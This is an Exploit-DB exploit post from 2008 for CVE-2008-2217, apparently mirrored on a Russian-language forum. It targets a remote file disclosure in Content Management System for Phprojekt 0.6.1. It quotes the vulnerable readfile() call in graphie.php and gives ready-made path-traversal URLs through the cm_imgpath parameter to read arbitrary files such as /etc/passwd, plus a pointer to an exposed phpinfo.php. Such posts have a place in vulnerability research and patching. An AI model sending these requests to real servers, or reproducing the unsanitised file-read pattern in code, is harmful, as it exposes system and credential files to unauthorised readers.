- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5510
- Проверка EDB
-
- Пройдено
- Автор
- HOUSSAMIX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2217
- Дата публикации
- 2008-04-27
Код:
--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
= Author : HouSSaMix
= Script : Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
= BUG : Remote File Disclosure Vulnerability
Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared
= Exploit :
target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd
= see phpinfo
target.com/cm/phpinfo.php
= greetz : V40 - marwen.neo and all muslims Hackers
=================================================================================================================
# milw0rm.com [2008-04-27]- Источник
- www.exploit-db.com
